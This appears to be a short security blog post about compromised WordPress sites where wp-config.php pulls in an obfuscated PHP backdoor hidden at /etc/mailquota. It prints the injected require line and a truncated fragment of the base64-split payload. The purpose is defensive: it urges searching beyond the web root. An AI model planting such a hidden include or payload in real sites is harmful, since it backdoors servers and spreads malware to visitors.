The Latest in IT Security

Malware on /etc/mailquota


We are seeing an interesting trend lately. A site gets compromised and starts to distribute malware to its users.

The webmaster (owner of the site) searches everywhere for malicious strings, and can’t find anything. Where can it be hidden?

It could be outside the root directory of your site. On many sites we analysed in the last few days, they had the following code in the wp-config.php (yes, WordPress sites on shared hosts):

require( ABSPATH . “/../etc/mailquota”);

Hum… It is including mailquota which is not a PHP file. When you look at the file you get a long string of encoded PHP:

ncftp /etc > cat mailquota
<?$GLOBALS[‘_1562346450_’]=Array(base64_decode(‘ZX’ .’Jy’ .’b3J’ .’fc’ .’mVwb3J0aW5′ .’n’),base64_decode(‘cHJlZ19t’ .’YXRj’ .’aA’ .’==’),base64_decode(‘cHJlZ19t’ .’YXRja’ .’A==’),base64_decode(‘c’ .’HJlZ19tYX’ .’Rja’ .’A==’),base64_decode(‘Z2V0aG9z’ .’dGJ5YWRk’ .’cg==’)); ..{$a=Array(‘QF45N1wuMTA3XC4xMzV8MTczXC4yMzBcLjEyOHw2NlwuMjI4XC4zNEA=’,

Which after decoded does a bunch of nasty things (include a javascript malware, acts as a backdoor, etc).

The lesson here? Never limit yourself to your web site root directory when searching for malicious strings. They can be anywhere (even hidden as Apache modules).

Web site hacked? You think it is? Scan it here to double check:
Need help cleaning up a site?

Leave a reply


MONDAY, MARCH 01, 2021

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...



Latest Comments